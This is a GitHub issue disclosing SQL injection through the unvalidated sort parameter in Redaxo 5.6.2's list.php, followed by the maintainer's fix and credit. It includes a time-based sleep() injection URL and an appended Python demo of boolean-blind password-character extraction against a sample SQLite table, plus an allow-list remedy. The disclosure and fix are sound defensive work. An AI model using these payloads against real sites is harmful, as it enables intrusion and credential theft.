Sql Injection in Redaxo 5.6.2 #2043
Comments

Thx for the report. Will investigate. Since you already posted other security related bug reports: would you mind reporting those issues to the redaxo core team? We can/will give you the credit after we fixed it in a release. Thanks for your report!

@staabm Of course not. But I don't know how to report these issues to the core team.

For now, please report those errors to info@redaxo.de. We are aware that we need a more secure channel, but we don't have such a channel right now.

@staabm OK, I will send the follow-up security question to this email. I hope that you will fix it and give me credit as soon as possible.

Just tagged 5.6.3 with a fix for the reported problem and credits for you in the changelog. We will do a release announcement on redaxo.org, again giving you credits. Thx for the report.

@staabm OK. Thank you.
Details

in redaxo/src/core/lib/list.php:716
The getSortColumn function is called. View the function:
in redaxo/src/core/lib/list.php:768
When the if condition is true, the function returns the value of the sort parameter obtained from the HTTP request.
Go back to the prepareQuery function above.
When the value of $sortColumn is not empty, $sortColumn is directly spliced into the SQL statement, causing SQL injection.
Since this file (list.php) is used by many functions in this system, there are a lot of SQL injections.

POC
Here I use MySQL's time-based injection.

First visit http://localhost/redaxo/index.php?page=users/users
Click sort as shown:
At this point the URL becomes http://localhost/redaxo/index.php?page=users/users&6c9fee27_start=0&sort=login&sorttype=asc&list=6c9fee27
Change the URL as follows:
http://localhost/redaxo/index.php?page=users/users&6c9fee27_start=0&sort=login`,sleep(5),`login&sorttype=asc&list=6c9fee27
Then visit the URL and you will see a response delay of 15s.

The complete SQL statement executed is
Credit: ADLab of VenusTech
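As an added illustration (not code from this issue or from Redaxo itself), the following Python reproduces the splice described in the report: a request-controlled sort value wrapped in backticks and concatenated into ORDER BY. It runs against an in-memory SQLite table with constructed rows; the table name rex_user and its columns are assumptions. MySQL's sleep() is not available in SQLite, so instead of the time-based payload the injected expression is a CASE that flips the sort direction depending on a secret value, which is the boolean-blind variant of the same bug and shows that the attacker's SQL is really evaluated. The hardened builder next to it rejects anything that is not a column the list defines, which is the check the vulnerable getSortColumn path lacked.

```python
import sqlite3
from typing import List

# Constructed sample rows standing in for a Redaxo user table (names are assumptions).
SAMPLE_USERS = [
    (1, "admin", "s3cr3t-hash"),
    (2, "bob", "other-hash"),
    (3, "carol", "third-hash"),
]

# Columns the list actually renders: the only values a sort parameter may legitimately take.
ALLOWED_SORT_COLUMNS = ("id", "login")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rex_user (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    conn.executemany("INSERT INTO rex_user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def normalize_sort_type(sort_type: str) -> str:
    # The direction is reduced to one of two literals, so it is never a splice point.
    return "desc" if sort_type.lower() == "desc" else "asc"


def build_query_vulnerable(sort_column: str, sort_type: str = "asc") -> str:
    """Reproduces the reported pattern: the request's sort value is wrapped in
    backticks and concatenated into ORDER BY without validation, so a value
    containing a backtick closes the quoting and the rest is parsed as SQL."""
    return (
        "SELECT id, login FROM rex_user "
        f"ORDER BY `{sort_column}` {normalize_sort_type(sort_type)}"
    )


def is_valid_sort_column(sort_column: str) -> bool:
    """Allow-list check: the value must be exactly one of the list's own columns."""
    return sort_column in ALLOWED_SORT_COLUMNS


def build_query_safe(sort_column: str, sort_type: str = "asc") -> str:
    """Hardened form: reject the sort value before it reaches the SQL string."""
    if not is_valid_sort_column(sort_column):
        raise ValueError(f"unknown sort column: {sort_column!r}")
    return (
        "SELECT id, login FROM rex_user "
        f"ORDER BY `{sort_column}` {normalize_sort_type(sort_type)}"
    )


def fetch_logins(conn: sqlite3.Connection, query: str) -> List[str]:
    return [row[1] for row in conn.execute(query)]


def oracle_payload(guess: str) -> str:
    """Sort value an attacker sends instead of 'login'. The first backtick closes
    the identifier; the CASE negates the sort key when the guess matches the first
    character of user 1's password, which reverses the row order."""
    return (
        "id` * (CASE WHEN (SELECT substr(password, 1, 1) FROM rex_user WHERE id = 1)"
        f" = '{guess}' THEN -1 ELSE 1 END), `id"
    )


def first_char_matches(conn: sqlite3.Connection, guess: str) -> bool:
    """Blind boolean test: reversed order (carol first) means the guess was right."""
    order = fetch_logins(conn, build_query_vulnerable(oracle_payload(guess)))
    return order[0] == "carol"


def leak_first_char(conn: sqlite3.Connection,
                    alphabet: str = "abcdefghijklmnopqrstuvwxyz0123456789") -> str:
    """Recover the first password character, one guess per request."""
    for ch in alphabet:
        if first_char_matches(conn, ch):
            return ch
    return ""


if __name__ == "__main__":
    db = make_db()
    print(build_query_vulnerable(oracle_payload("s")))
    print("leaked first char:", leak_first_char(db))
    try:
        build_query_safe(oracle_payload("s"))
    except ValueError as exc:
        print("hardened builder rejected payload:", exc)
```

The allow-list is the right fix for an identifier position: parameter binding cannot be used for column names, and escaping backticks only prevents the quote-break shown here without stopping a caller from sorting by a column the list was never meant to expose.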